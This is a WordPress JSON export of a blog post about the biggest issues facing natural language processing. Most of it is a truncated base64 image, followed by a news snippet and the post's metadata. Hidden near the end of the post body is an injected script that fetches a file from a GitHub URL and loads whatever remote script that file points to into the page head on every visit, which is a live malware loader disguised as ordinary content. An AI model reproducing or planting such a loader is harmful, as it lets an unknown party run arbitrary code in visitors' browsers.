ilxJ3Nu6odCPVFiXnvMA68iWC3CLg33PqPqjb+PcOisUhcwykecy13Em26hbdP4fdGnFBQVa9vGLHMmWaDPeFPo6xo1AGzrbtPeuSPdPlmtDoj4B\/Edywbtrm2EDdAKQbevc\/SYymT8XfxV+GMNxsy80laU93VqEZRX2TYQBfrePntmHB6jAK+XDakWfGS0+XuPpXbMGqo62IVMfikBK9HI88lzbo8P9WMl9QbqbjlgpLg0lJF9iP5oxKQq0xKq+yL4\/wBFBgrE24iqeYSbZXMLsLnkm\/8AQ\/NFbE24AS1I\/elRn488zThnA9Ny\/o84G14jnXX5oJNiqUaF9NuYusj96Y5+y8+oz82wk2upNr8rWjdfGfjZ7EWeFRkHFgpw82mlA7EKUgFS1fvlmI9KmdD5dVY9s0Bt1Ij6MdEOADLuVaaNws+Qa3ed24\/BaHiL+0VLj3bBLMktMy48ypalLlzqF+oPP3Xi26f0VsD4QlUOYVLVdPbqQFTLZJCBYbDYc4Wn0\/G3IteOm+NYrAAsbKtQaLlOfFxdTZEIVBGmWW3bY84cSGXHJdYG4O28IsiwqXdcbI21HeEeLSApWm+yzS0qbl9QID7J5eIhOUQ7NJC7ak3uFQoalS7vagkXACvXeMOssloNTzQ2VfVBJtulab7L3UZRM5LSy1K7NxF+\/wD3QPIxjLlmUvJm5lnWl74t0HkVC4Ch7vvRltOibkphq1yn41P4YpLPtmT\/AEQNWggEHp64V1r3CANtIWyOHWqO4dzPlqc66VStRQZdJKvRUO8j6QRD5z9mteJESZeb+KHaaSbi2\/ONNT1LnqDVqPM1IzkvKPzkuwZtILagVWUFtr9SdwfVDsxnMTFVqjk9VJ1M47LqLK5hCikPFCSorCb2FwL25XimipWSYm2qadgPxVm+pdFh5pjzKY+NZoMyaAq7fZqCm0jmbkpT9N\/mi9Vyik4VATcLDV3D1JtCTWFCsYnplIU4XEtqEw5YfISNQB95i\/jqZLyWqcg7vrAFvDaLx7wdTgqkDdo70qYGkPg\/DLKwg3mFBxXiRv8Aji\/WZtcrT1uJSbWVYQoSzTUnIysqe6WW0hW\/9OsM+vTjtYWZCWWQAopUekI86Iw0cUjQHPLknYApJnqvM1x9BuV9y\/iYfVeS3dTjZUSlKlAq6X3j3hqjNUqQSEo3UBsnxAilYBAWlQIKk239Yh0MZZEb80179cgIWDLuqaQy8lQB7O5HWFrC6w87MTC13LroINjYJHPlDUeU60lp35IHZj8Bh0UJKqdSWFqWSXEqVbfVe\/r\/ABwsO7rJZB4N16ka9OU7M9uakHFIdYS0+28L9x1tVwb+N46p4Tr0vi7BNMxQFNLmKuw06NHf0EgXAPQA3jkRSphL2Nn5jSQlCCLi55\/ejo3wsVk1TJKltlLpXTJp+UXZdtQvrFvAWXHmz4SmCMrMEgxZrfCjfpJ52cPeFf5fn6uYxd4W+nZSSlgZx8a1NADSBYX6G0WKc8qZrC3tITqlwogdOXL54y32mpinOIaQgEsnSgKvaw2JMYNBF55xR6SzYPtsDHidu5K255uLFYFYClVWasfRWEn3CCLdSXrqc4q43eV9+CHqPUnQ\/KOurLqQbLsd1DnYRadk3ktKWoJsnnZQP3oSsTY0k8Kz2G6e7IPTJxBPopYUF2DKyw68FkW3GllQ23uR0MNPEGeVEoL1XlZqlTAao9bkqE6+p1KUKVMshxLx2JCUhQBHPw6RnUmA19aA6BlwRf0X0+1TGdrW2Ke4UHLK8Y8zSbJbt6\/wQ16bmCiexdMYKaoK2ahIS0rNzZcmkqDTbzRUSLCyghelsm++oEXsRDTxXxH4NwZO4lpNTkZiZn6A2y8yxLKS8ag2tAUtTWm4SGySF35aTz5ROzLWJyydTHEXOsDYEHYkWP4j0KNszB4XJbJJUoK333jxq20H0h1jXEzxFYQlahOUgYTxa7NS8iqeQwigzHbOrSAVs9mUa0EXb7ywlB7ZFjF2Szjo1Wfoq6BKy1SRX5xUiwpifQezdDby9K0+kiyWCDqSCCoC1wYyRlLF2Ea4beke\/wAidJM07rYCdlaleiI9v3CEJPK9xGvZvOWnU2gYwxA9h99beDUTy55hMyguESqAtVtrd4Egese+Lr+cVOYkpWrKoM0\/TpqprpIm2nUuN9vo+KKCn00uOfEgjk5ZMIMsYm4F3VbA24jja\/fxsoetYtjy6S4kNrJUk9CYtLbLDi1JAsgG0W5SZX2bTj8spp3SkrQDqCVdRcc7GL760uBS0vi6wdjGu6S19ipg7klGaUFJbV17NMJrm67nnGdLsuOlClup0aQQb89uQjAJB3AIve4Ptj0z8G7DWS11XXuG7Gho9J39i53n6ocyKKBvMk\/d\/wBqhjeuFZZMvQJBpKbDsEkj1kXMaPlZV+bnJaUaGpcw4ltKbdSefuveN\/yMt5nJy8oNwyhKL+NhaPUeLu8FrAteynFZz5eQACvlII0n78aQ4p22UYVpSg2gKXUNzbc\/FrjcNZqnwSiVc827bzmbalrds23p1m2rvqF7fYi6j0BjUHFLqVhOkgC9qiNh\/ilxqGN7UMju4LrGVN8XgA7\/ANCmVkgqVazaqL0zdtlimPOLVMFY0pBaJKi73hbnc9PVaHBw78WuFc\/MfYywbTEsSwoj5eoqySFVKniyFPgH+73sNwlxF97xoVyiYrxNhbGVOwvXm6ZNO4YnVzEy6lSyZZGhbqE2NwpSU6L8gFExG\/glw5irEvEPQE4Rr7FJqFLbdqRddbKkPMN6Q6wQkg2WlZHq9togywxr6Au8pWbn0OixYRnk1o\/BdjHm0uNrQoXBBH0RHuoMCWqM2wkWDb60Wv4KMb9fmUyss6++oBLSCtRJsLAXjQE28qYmnnl+k44pZPtJMblhBBe4ErkWbbdXH33P6KymWTNvNNLVpGq1\/cYz\/gdkpu48shI3sB4e2MEurl7PISgqT6IUbA+2MlFRqSk7sSiSRcpBJHvN7R5F+EPhsdNmKKqZxkZv5wbexbVkKse7D3Rn5p9u6y5WW81mZINqUpClPEFSbfJT+KG3mLiD6ljUcRFwt\/B0k5NFQNh3ElVj7bQvU6efnZyWMw022WnFoAQTY3RfqY0hxtYnGFspa64k6Xqkw3T297H4w7\/6IVHIMs4W7F8XpqFguXvaPvK2yqm0sMh5LmTjLEk7iKuz+I6ismaqc49NunVeynFlRFz4XtDdlXy6UoSo\/FuLB+e\/4foj1UVmYbCybEA8vbyhMNREhNOOODU242TpTz1D8MfTuKFlJEyBgsGgAegWWg+MSUpuVFLc\/Jdm2oIQ\/wDGKI5hQtuYeR0vrKhyGwjVD1bbmmNEq8spK21KSTyIUNvWYfshVjpDI3sCNvGMqB+vgkewgXTgYRf4rle55wmBqzpQocjY\/PCjJzAVqBIFyN\/DaPBZ0rcKwR3FWJjId4RuoQbFYbxF9x4R5Wymbp62lC572n1Rcfa8QbHw6x5pzpWp9hW6tym0NdY7JwKS6QpTS0LUdk7K9YvaMqcY7F5xtAskJKwPeLffi0oBDjrJGnVb1eMZs2kzNHZm2fSaSW3T425Q0DUxPJsUnzlTr2IHqVRqnXZ6blZN0NyjD8w4tpgKNjoSo2Rt4AQ7J+YKGpiYU6kAIULDqFA\/PtYQ0aI85MVptxIP6HZcd5c+7pHsIURC9OIdW0JNKQ7ZKUFJTY6jYDeI6djWBxaklNykvBTC3Z+p4imk6D2pl2772Snb78WyhVbxYgNqCm5fc2584zUlulYfSArvL1O2vexPjFMAy7hemqo4ggkGxtsbwrjp0tRbcuSxiOcU2sSrCiVqGm1twPGMSj0zzYfHIBO61E9YzBLmfqT848k2bVqQbbWEXluELIta4tEmnW7UVHewsEryjoLaAvcblNttvdCZWXQ45pO5PdEZqCGZFoKUU6E3vbr4QnpQJiYKlLuFp1XPSMp3i6VCDvdYk\/JL+D2keuLleqrNGpCD2qu0DAFr7cukK8w2yUBpxJAbFt419jKaVPVNuUbVpbYWnXvySBvEbm9WLp7SXbFLeDmixJLqLhPazZJuT3tPsiXXBtmzKYfxbLZV1SUC5XE7jj8o8XP0uZZbvo09daRt60xD6ktLbUZp4K7ZaQNPRDY3Ah95b1OrpzPwknD1TbkptmoIKppTCHfN0OFKNQ1pUkKKSoA225xp\/SBgMOZMr1VDKPmlw8jmi4KzKGcwVTZD5l1Trs4ZZRp0ojSFJKlFO2rwEZNAR+iZonoG0+7SYSH5ZLbQCg66psAB8rBKv8K2whboOz84ehdAB9gj5juboJb3Lfw7Xum9OkmdmFE7lxRPzmCPKlgzD6r3BcVY+O5ghqWwSriDDtKrr9Ndqcmp5VPWmak1B1aC06W1N6wUkd4JWtI35KVCTOYFwU007NTVLYlmhNy9RcWp5aR5xLNhDLhJVYFCAAOmw22h6za00mnuzczPsty0s2pwrUi5SlIuevhECOKfi0Zx3TZzLzArqH6JOy7jrtQCFszCXmLqW2EkciRYmNvyjguM5jqm0tE5zYxs51yA0E3Pvt3pksscQ8LdbrqUw1mTiL4VoEtOimVdKVsMS8wtlytMsgoRNTLl\/iZNOo6NICnCpJBIIC\/c7g7K\/DEy5IYtCKtU55pxsUWkyqylDK9GtCGWdTyknQ3qUtWklIOlJ5N3IypO4d4fsIrpVQQ9ijGCGZOXfeXqLdkHTe5vpaaQtw+JCvGGnhuu4hzcx9V8C5WV+coGCcPPhvEGIpMpVVq7Ni\/dbeVfSCUqseQSCq1tKY6Lh2A1+KVr8Po3FscZLb3sSGm1yePHhbc25AbZj54KeESOHH2\/8\/5dbbXLYBl5v4ancq8SSThbdQZ4SUytwNuW1alNKU4kbDdVgNI5Wi2xl9hiel28TYLU1XGm5h+dYWwttuoS0y6pZccZmEgBaruL7joJJUbqINob0xw9tU9FRnMIZlY9plUSFLl5+Yr65hth9KAoBTLgKVMnuFWreylWKRazWyrzWxBNVXEFOxZT5anZhYGWpddakxoYrkiCAp8I2AeSkpWCPSFrbLsmxxzJWLYFT9ojlLgOO5P4b2G9rg7X3FlHTYhBVO6stsVsjDMvh2eZnMD4ykmphvEqZt5E4VLaYqyXEhEwHGrjs5jTZLje1xfTsFBL\/ZwRhREkunN0sJlVzyKkW9awPOUKSpLgIPPUkK9ZFzvESeMWccpeYuBsTYdqC22Z8Jn1tMuHs+3BPxtgfljTqHI6b8yY3lw68TeGM4peToVfeRTsWzDLkyuny7a1N9iLWWHFAA3BG0ahjuX8YOGRY5RueWO3e0E+C4bXt7Ty5cVjukiZO6K1gOC3ECsbXT7jFEhZXdSTaxhdRT2VpFlTABH\/AGV4r8DsK2K5mx\/vccmAIO6lu08FbZmVKkmZYtpTYA6vcYTbFJKSbkdYcDVLlkJTYzR0pCfQ\/mhJqMumWfKWw4dQBGsWN49H\/BxxdtNidTh7j\/MaCPO0+4rQc+0vWU0czfmmx9P\/AEnVlhSfOq05VHWypuTbsgkba1fzXjbIUL2\/BGiKViat0JpUtTZpLTal61JLaVXV7SPVG56BNLnKRKTrywtx5lClG1rkjcx6ixKN7ZOsdwVVlqqgfB2eMHUNzdJOZM9QqNhZ\/EuJKm\/I0+hOIqbq2dBUvsjcN2Uk31GybCyiSACDEPH+Id\/OLDkxRsQNJlqtKVpc7JtC1jJLQsBFwN1NkhJPUKB8Ym3XaRSq9THqdWadLT0osalsTDYcQojcXB25xzqyhp9OXlbUqqqRZM4jEDLSHygFxKDKqJSFEXAvuRe0a3jNjh0pPd+q6PlQn9s09vpfotmZffqLG37jav8AxYiOfk4f1zcpf\/uCo\/8AhxIzL\/8AUWNf3GVf+KERz8m\/+uclP2gqP\/hxj5U\/w4+crP6Qf8a9AXS\/MysmQpCKcyqzk6dKiOYQNyfvD3mNT3JUSfG4hx4\/qaqjiR9FzplPiUj75+eG5G\/0FOIYg7mQuA47Wuq6pzQdgbAebZAZVMkNAA3NtzaLqsPzaklIUEeAQ4bH3Rl0aVQ8+tb7YW3p2BHWFfzWVSLJl2b\/AOAI8ZdP+Kx4hmRlLGf5LA0+cm66RkeF9Nhxe4eOfwSLTqY9TpiWDpQrW+o3HSyDziF\/lNcYS7Zwrg2WmyJleupTDafkoSChGr2kqt7Ina3KyiFpWGW0kG90pF7nqI52+Uww2ZPHuHMQM08ITUaU6yp4c3HWnB3T7ErTaKfoQp6efOVN158XU4f3AG11fYs4ilcQoTTvfaRd3vEXMIFVUp1nufpku5qTb5SYXnUhEu2paQskWveEeqMFGmbZBSlPdX1uOse\/Jm3uFqEZATWmFFiYDjZshZBsOV4XWMSTLK+0ShSkg3ubje8I9Qa7F4t\/2tY1IV4QpYZrE3JIdQOxcRc3Q82FixSRsD7YroXOZIWgrMc0ObdPzDuKGZ2XUnsyV8+cOyRm2ag12gUCADcA3teNb09uSamUPCTaSbApKFrFvphfkqkiRmJl5MuhDaUpPaqUvSlPMkgekdvV15xbCo6tl3rCMes+CnZNNBKWwOd+fTkITkBMtUEAkBDlxqB2vHiSrDs1M9k4hooSpQSLHx26x7bnprt1ISptJUhYPc5ahYge4mJC9pGoJmkjZVqskXXtTabFe4tHqhrLrcxITI0goJA8Tyi23MPtqRfdDaElO\/MWi29Ntyz6XzspJtt1B3hGvFwlDSRYpNw7LqlqpUrFRQhKW7q66ljYfNDjduHmipDt1uBwkLsBYFQ+a0ItALr7dSm21JTrmClQWNVgEk8h7R88eJ6cnUhbgm1rQlCgUoQdI1WRY9RsTDQ8NBsU5zdTlarE32rLMmxa90tlIHTrDlo7jEgESJeDSSi6jYkW25gb9YaVJbbbWZh1QceuRtySOkLtOcLtRStRUQhKdew5FxOwv1iHrCTdKWbWTiZISlxxlCVNLJSlYJFwDubGLKwtT7pTupIQQEnfc7fii\/LtLYkuzdHZhKl2JN73UbD6IyaTMTtEqrVSYYYmFMpR8S8LJcIJGkqG4ulR36Gx3jMc8hvg8VA1tj4S81ZLriBLAqQtvvqSs6SE7DkfXeLSLSUvqslbgbukqUNI9e3thaxlXXMUTUnPfBbFOblacinIbSrWpSEG+pajbUolRubbbDeG3Mlxo9ktbKClvSbkXGw\/FEsTnPbqeLFNIbfZWahUQVXL53UQogWBAhq06YlKu8mo9oVdq4vtCkXtYnb5hF3FNVl5WnPzKnLEMlVh1PIC\/rJjFwnKU0UyVmEdqtakhQQ5shJPW3X3w2R93tb6VK1to9ScaRN1RstUdssSyR3ph0XKt99I\/Dyh4YDw\/OzlbptIoLDqp1+ZbDRTcqU5qHfJ68r+oCEiUeQ5LIsdybXB5Q\/cocayeAcysO4nnAPNZOaT52NAVdlXdUbEdASb84gxp8sOE1EtO3U8MdYHmbHZQMIMrWv4XXSRtTTUshkuthekJcIUqxsN+kLeHiHGJl1BuntifdCiwxTZphuZlkMOMvIDjawgWUki4I90ZCWW0AhtCUA7kJFrx8pajX1rusFnXN\/OulsAaNkwm2wsru80khRFlKsecEPfzGR1KV5o0dRvukQRCnXWkuMjLnMDMfL2SkcvphTMzIzRm5gomSyVMpRuLj0vZHNCssPMT8yl9h1hS1VVwBaCg6TqsbWvbpHavY+lyOxuL7RGzit4Y6bmRhyoYxwlSC5i9iXEvKoSsIbU1uFjTa2opUffHZOjLpAhwQNwqtaBEXbP5gk\/O8nl5LBq6frDrHFRUwtkFmRiTCmBq5TsxnJGSxIw2zTmlU5CkyqxLFRQVl0W1BtaQbC5IHWNs8DeJKfLS+KcDTPaqqdKqnaTTc1INy2lKrNFJDa1juqaUCTuCoC1oeuRlL87yWoGWeJZ9uWn2pZDtInEKBKH2jdTQJ5PsupV3DY6drd0w18aZd1Km40czHodalMAY6Uky9RcnJdTtAr6dhrUtIuwpWlKlXBIUPlHvno2B54EGKzU1fYAOOkgAbXNjsNwRseNiN9isifDdULTDxsOfepVz9TpTUrNMsyzK5gL1FJc7ylFptIsgpuo2ubDTsOnTnniqkT2dHEBj6cwXi2Zo7VHYL07OqpTK222ZVlpl0qe7YLVqU2tQuBtt033JVsVZ\/4glzTZ3HGU+G5d5xJRUZCrOTsw22GktqLLO\/aLITcEgWvsQQFQ4sosmcPYboi6LQ2JxFEcdRP12uVQdlM1l1slYBSTduXSdSjq577EEqN7mzPlBTUpNI8OdbbYEC\/Pfie4d\/k3WPRYXKX\/AL4WH4qJua2V2MMs53CRxdil2rrqul+WaXKJZMqgJI0bLVc7jbYC3rhsZXZd5gZiVxNEwAH5aoTFIbU1Mh1bCUpSpBX8aORsLWvEquITAGLM6s0cGJwzKpNLZJ7NvVpc81Qv4ybUk+ilRVZAPMJHUkCUmW2VmD8qsNNYYwnIlEqwtbgLp1uBStyNRF+kabiHSY3CcDiDmtdVSAm21mi58YD2c0k1FadzbWATqw229TsP02Qnzeal5Nlt03v3ggA79dxzhR85bv3jtGE48hJK3FAHrc7xiuVJlNyg6rdLWjzZNIZnmR3E7rODbCycCLFNxyMYVWp\/ncuVNgdq2NSB4+qMdFWcLSAhm3dBJvFtc9Num2uyfEbGLDAMbqcu4jFiNIbOYQfP3j08Fj1tJHXwOp5BsR\/wpF3HpAg9RG6MFT8uvDNO1zDaSGQkhSxcWJG8ahmZe6ipo3UTc3jE2HhH0Ayrm7Dc+4eyopJAHjxmc2nmLd3cVyF0VTlarcJGXB4Hv8v\/AMUg3pyV7B0pmWzZCiQFAmwG+0c78oUKbyfqrayNSMSspVboRKLiVmCD\/VtVufmr9v3hiK+VgUnKmt3BH\/Shrn\/8KuDMtP2eglaDfYe1dL6P8QOIYrTyltvCt+Cf+X\/6jxt+42r\/AMUIjp5N\/wDXOSd\/+4Kj\/wCHEisvj+hcbC\/\/ALG1f+KER18m\/wDrnJT9oKiP4uK7K3+Gk+UrYekHbG7eQKfWYMqJbE8z3QO2CXNvWN\/pENoqCdzyh75rpaTV5Z5tSS4Zc9okG6k77E\/TGvVOlZNlbD1wmcekfDsn4WXucHVBFmM537z3N8q4yzLlRX4k9trMve\/kPLzpVZrSZVgNSzI1XJKlG4v7OcWV1yokE9qkX\/uRtCcAAdgIF8j7I8F4niE+K1klbUu1PkJcT5SutQU7KWNsTOAFglOVr04lwGYWXUHYp2HPryiCnlJcx5Ws4twngeRZ1Koco7UZtfVK3ylKEDxslsk+0RMirVaUodKm6zUXg1LSLC5h5ajYBCASfvRyTzIxpUcf47q2LKpMPvuzjzxQHlai2z8hHsSkge6O6fB7yy7Ecddi7\/Epx+Z2w\/C6q8an0QdWOJTPnezS2lS1JSnUdhyEYE0G1NFOpJChceyMarPaZcp17MEDnzBjBMwly4CgCkeMe1JZNLiCtcYy6SKk0PNtABulZI9kYlKmUMTR7S3e235XjIqE6FXAG0JFyp24NiSN\/CKieUxvDmrMY24stiyrko6guBtQFgokK5W5jeFTzWWeSloJK9huqxt9MNCRnky6EtqmQsKG907QvyU8OxVpIUL8xF20te0XWE4FvBOCVaDa06Qn7PZY5wphLmqzTbWoi41OX328BCBLzxU6UpIudhcwoedt6FBQSty1rFXKJLtTfC5JTZDi5ZlLqUBYb7NekbbEiPM1T0usKKlDuo2i1LTZcbaCttOoW1E23jxWasinSjrhcBUUHSm1+kOuC1M3vZKmUs1QKZiGUdr8kqdpctUXDPMMqSHVtdnpBSVd0lKilQBtcotfeKY0lqVVqtMzdHcd8yU2lttboSh10IUe+sJNgo+AJ2AhoYFmVLk3HJlVlrmVOkFGpJ2R\/PCxVpJ1Mu7pS2kqAKVNptqJXtfeIWxNd+8HFSEkGy8SdIQ0kkOAd7lfnGWllkB5t3UQkINrXHWEVlmoyyE6woKN\/RFh74UJJ+aDlphxJUtSL6jyG8Lv3JHC+6crHm25DRAVa4AGn5ozWFSqyFKbSru3N0Dxhvsuql0FbyrqQrY38eUZTFWZcU6jtO6gBOx6Rlskta6gc3uStMhvs0pbaR6VxdINgYT52eUUqSy2GkpJCk6Rv64ueeI0agklNuZOwhDnagEodWXQrci5MZmoNBKjYy5TIxvUm5ycbpDZuhmzrx8b8heMilzKzLJSuZUlKdm2knaGHP1NczUJqY1q+PdUTv8AJvsIXsOzJnptpkmyWhcg8jGuMqeulJJ5qyfHpZZbcoSyiSbZuq57wvvb1QuAlQLv9rSNja+8NGkvzDSwSWwjVc2528IWpSsJmWFtN6whJuojrY7AeJi\/p3Assq2Rh1XXTfhVzNksX5PUlqaecE7R0mnTPaHUQpHoG\/rQU8\/CNzt1KScOlEy2b7bqsfwRzq4U86qXgPEbmD8QTARJV1xsIcJF2H+QKvUoED1WETlKlHmTHzl6YMqS5WzPO0NtFKS9h5EHj9xW84XUCopwb7jZPYKJ3QjWPG4ghmJffQLIecSPAKIgjlZdY2Vinqucl2zZbgPqB5xjrqZvZlvT4FR5RpUcWHDVz\/NqwkVdD5+iKjiy4bflZ1YT+6KIvvilj\/EUUt\/7HJOuj+klPG+Wk6\/N1DEGD0SrjtQcEzP0iaUWpacfSBZ5DibqYf7qbOAH0U3BsIYdHzjqZmajTagllLUjUHKUZXEa+wmTMNM9o6gTDSVtr0kEW3UU3XsAAp0K4r+GpYI\/NqwpYi39cUCEWa4iOExyrprRzLwOqeQ75wJgzDalh7si12oP2fZkt6\/S0EpvY2jcMNpcZbEY8ToJX2A0kNdcWtsffxT2VgYLBwTWaz\/pEvh36q6fltQW3kP9jNst1dKn5fQViYc7NMuC4lrQo7Hv2sk3IhVoWNcV5uVCu0eTosvOS1IqTUo1Mur7OlEdgzMCYcZ\/TXv05CkNFRCrBRU2bAZMrn5wiyI0ymY+B2E+cuThS0+hI7dzV2jm3yl616j11Kve5vkUriN4U6I7Nv0fNPBsm5UHEuzSmZlCC8tKEoSpVuZCEpSP7lIHICLCop52xvNLhUvW\/MLg823B8vK\/O26Q1pHBwW1MIYeksJiZnO2cqNXnyhU9UXkhLjxSO6kAbIbT8lA2Fz1JJWnZ19eyVaL+BjUQ4reG8fsz4W\/hyYDxWcN5\/Znwt\/DkxpFTlzMtXIZJqSUk\/wCx3u4JgnjPzltdRdcF3HSbfTHjexvGq\/z13Ddb+zRhb+HJih4rOG87fm04V988mMf4o4\/9il9R3uSCePhdboZ\/SkDwAEXU8o1E3xY8NaW0g52YS+6CY9ji04ah+zZhP7oIhhyjjx\/opfUd7kvXR\/SW1nCBeEUzaj\/ahGv3OLHhrUDbOzCX3QRCL+eo4c\/ty4W\/hyYtcJwrNuCVAq8PgmjeOYa4fosepjpauPqpgHN7it54WrkjTKn5zUAtLPYuIPZpuo3TbaNX03K6iYcoM9hug1adel52qIqQem2kJcRZtSNFkEgjvXveG2eKfhzvcZy4W\/hyY9J4p+HO39mTC38OTHQ63OnSRX0\/UTQPItYnqtz59vZZQYRS0uCSCWjOkg3G97J40PDE3RWqs0xPItV6XMUxai3ctpeGlSgL2JAho5J8P2F8j8QjFmH6nUZqs+auSgmXlJAShYGqyQNj3RvvaPH56nhzH7MuFv4cmD89Tw53v+bNhb+HJiglxTpAkhNO1kzWHk1hHsCsq+sZiVR2mpIc\/hfzLbk1UahOq7ScnHXlq2UtxZUojfYkxY7o2Smw8fGNVfnqOHNW35s2Fv4cmPX56jhz+3Nhb+HJjUp8t5jqn9ZNSyuPeWuPtUDZYWG7Stqpjy6grQUpJuoWFucar\/PT8Of25sLfw5MH56rh1BBGcuFrj\/8AfJiH4pY+duxyeofcndfGeabfGXXJqj5D1QyzrjXn0zKyriknT8WpY1A+o2IMc3arJp7UTks8Tc6XLeBBB+8IlRxw5+5bYzwTQ8K4LzGpdTl5mecenkSEwHNIQlPZ6x9jcmISLrCKW2WpCqS5btv2T2yvWUHr6wY9n9BOFS4Fls9sZofI8usdnWFgLg+Y\/etXxU9onBZwAWTU5VQaUvTyOlQ56hDXddMuhRQe1QdtQ5p9RhyS+J6XMoQiZdCVpO6jyMY08nDb7agxUGGlG5vqvf2iOtSPjk3Dh96w2BzTYhNB94rJBMWLm9wbRkTYZS8pLTgWlPJQ5GMc3I2EUVRISeKzWpQlm3nmytJJ0c7QtU2cWyx2ar7mwjGpb8m02255000qxC0q6xeVNSKXFK86ZseXe5GLyJ8bYwdSxHgl1gEtszikKCgoXB8YszNVmC6sNqIKjsRCa5U5TzZCUzLGv5VjvFZKoU1Tp84mkAaTYmx3+eF7Qxx8ZJoI5J7UKZcdZaC16iQpRJ6m8YlcdVMIOrlyjDo1do7KB2lSZbuhSbKUBYkkxjVat00oKWZ9lZH2KxGR18QZYOF\/OotJLuCVsJOhiQ0tHm67sDY\/J+mFmpVQAJcSwUkFoqCjuLK3+9DWoOIKLKyiUzcywol1alJUd+Yt96LlSxJRFp\/Q06LFSboKwQAL\/jhzKqJjfGCV0ZLuCepdanmgEgBXpW8RGFMMlUyppKCCEp3t0sYQpHE9HshS6kw2UAgal87xdXiaiPececVWWWCUhI1dOvKJu0xOHjD703q3DgEt6XBKlT2hIJA3O5ty2hKp77appaiF3KiL3225bRaXiajOM6FVSVISNrrBIhPlq9SZeZWtFSlyFA279rQ11TGLeEPvSaHW3CeD08pDBSVDSkbi\/wBMN7FQmpagzM0hfdbSNweeogA\/TF2XxJQexdDtVlQ53dOpYIPu9UYmMsQ0SZpcvISNQl3hMOpEwEq5IAJ929omnqoXQOIeOHemsY4SDZaq+Vt4wtUuZMmyt7WUuHkRzsISXEhtxSNQOlRFwbiPYd1JCCqwjVKZwZvdWjxfitk4CdqFXdmdLzjocUEJCjsPGNhS0qla22mkBCJUah4LX4+6NR4QxSnDzDrLDzPxxBJX0+eHSqr0l9QnaxiGVmVr7wYbmbNp9RtzPsjZaWsjbHYuF1WzRuL9hsn\/AEKlyL2KqM5MNr7b4QYUHQo6ivtE22HSOskcj8osUYLp+YmHajWMQ0uQpkrUGFqSt8JSEpWCorJ6COjn56jhz+3Lhb+HJjy98IygrMaraNtBA6TS1xJYC4C5G23DgrzAg2FjtZ4rakEaq\/PUcOn25MLfw9MEebfihjh40cvqO9yvuuj71xQ1GAKI5RSCPfN1rarrJg1GKQQt0Kuswaj4CKQQXKFXUYNRikEIhV1H1Qaz6opBAhV1GDUYpBAhV1GDUYpBAhV1GDWocopBAhV1EwajFIIEKuowajFIIEKuowazeKQQIVdZIsQIAojwikECFUqJ52g1GKQQIVSsnnbf1RS5gggQq6jv64ConnaKQQIRf1RUKIINhtFIILoVdZPO3zQazFIIEL1rVa0U1K6m\/tikELcoVdRg1G94pBCIVdRg1GKQQIVdRtBrMUggQgm5uYqFEbiKQQIVdRgC1XvsfdFIILoXrtFbctopqPjFIIEKuowRSCBLcoggggSIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQiCCCBCIIIIEIggggQv\/Z\" width=\"300px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>Read more about <a href=\"https:\/\/www.metadialog.com\/\">https:\/\/www.metadialog.com\/<\/a> here.<\/p>\n<\/p>\n<div style='border: grey dotted 1px;padding: 10px;'>\n<h3>Natural Language Processing (NLP) in Education Market &#8211; Global &#8230; &#8211; Huntsville Item<\/h3>\n<p>Natural Language Processing (NLP) in Education Market &#8211; Global &#8230;.<\/p>\n<p>Posted: Fri, 27 Oct 2023 15:57:10 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMiqAFodHRwczovL3d3dy5pdGVtb25saW5lLmNvbS9uYXR1cmFsLWxhbmd1YWdlLXByb2Nlc3NpbmctbmxwLWluLWVkdWNhdGlvbi1tYXJrZXQtLS1nbG9iYWwtZm9yZWNhc3QtdG8tMjAyOC1zaWduaWZpY2FudC1yL2FydGljbGVfMjcxMmU2MDktZTA5My01OWRmLWIxMjctZGI3MDhhM2Q4MzJhLmh0bWzSAQA?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The 10 Biggest Issues Facing Natural Language Processing Finding an expert who can work in a technical system, but who is not afraid to read and analyze text for both meaning and structure, may seem daunting. I recommend linguists with NLP, corpus analysis or computational linguistics exposure, as well as data scientists with a text [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[439],"tags":[],"class_list":["post-4664","post","type-post","status-publish","format-standard","hentry","category-ai-news"],"_links":{"self":[{"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/posts\/4664"}],"collection":[{"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.2megy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4664"}],"version-history":[{"count":2,"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/posts\/4664\/revisions"}],"predecessor-version":[{"id":4742,"href":"https:\/\/www.2megy.com\/index.php?rest_route=\/wp\/v2\/posts\/4664\/revisions\/4742"}],"wp:attachment":[{"href":"https:\/\/www.2megy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.2megy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.2megy.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}